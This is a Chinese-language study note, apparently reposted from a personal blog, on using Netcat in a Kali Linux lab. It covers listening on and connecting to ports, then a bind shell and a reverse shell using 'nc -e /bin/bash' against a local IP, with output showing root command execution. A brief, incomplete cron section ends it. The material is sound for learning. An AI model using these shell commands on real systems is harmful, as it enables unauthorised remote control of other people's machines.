【二】Netcat – TCP/IP 连接的瑞士军刀
介绍:记录学习笔记
1.netstat -antp 查看开放的端口
2. 打开端口 nc -lvp
打开端口并监听接收的信息
┌──(root💀kali)-[/home/kali]
└─# nc -lvp 8080
listening on [any] 8080 ...
192.168.159.129: inverse host lookup failed: Unknown host
connect to [192.168.159.129] from (UNKNOWN) [192.168.159.129] 60860
hello world
3. 连接端口 nc -v [IP]
连接端口并发送信息’hello world’
┌──(root💀kali)-[/home/kali]
└─# nc -v 192.168.159.129 8080 1 ⨯
192.168.159.129: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.159.129] 8080 (http-alt) open
hello world
4.shell
<1>.开放式shell
- 打开端口并用 -e 选项绑定主机的shell(一般是/bin/bash)
┌──(root💀kali)-[/home/kali]
└─# nc -lvp 8080 -e /bin/bash
listening on [any] 8080 ...
192.168.159.129: inverse host lookup failed: Unknown host
connect to [192.168.159.129] from (UNKNOWN) [192.168.159.129] 60862
- 连接端口执行任意命令
┌──(root💀kali)-[/home/kali]
└─# nc -v 192.168.159.129 8080
192.168.159.129: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.159.129] 8080 (http-alt) open
whoami
root
pwd
/home/kali
<2>.反弹式shell
- 打开端口并监听接收的信息
监听端
┌──(root💀kali)-[/home/kali]
└─# nc -lvp 8080
listening on [any] 8080 ...
- 连接启动的监听端程序
连接端
┌──(root💀kali)-[/home/kali]
└─# nc 192.168.159.129 8080 -e /bin/bash
- 在监听端程序执行任意命令
监听端
┌──(root💀kali)-[/home/kali]
└─# nc -lvp 8080
listening on [any] 8080 ...
192.168.159.129: inverse host lookup failed: Unknown host
connect to [192.168.159.129] from (UNKNOWN) [192.168.159.129] 36254
whoami
root
- 在监听端程序执行错误命令时,连接端有回显
监听端:
┌──(root💀kali)-[/home/kali]
└─# nc -lvp 8080
listening on [any] 8080 ...
192.168.159.129: inverse host lookup failed: Unknown host
connect to [192.168.159.129] from (UNKNOWN) [192.168.159.129] 36254
whoami
root
whoamim
连接端:
┌──(root💀kali)-[/home/kali]
└─# nc 192.168.159.129 8080 -e /bin/bash
bash: line 2: whoamim: command not found
5.使用cron进行定时任务
- crontab文件:
ls | grep cron
2.crontab配置文件
cd /etc/crontab/
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之家整理,本文链接:https://www.bmabk.com/index.php/post/92703.html
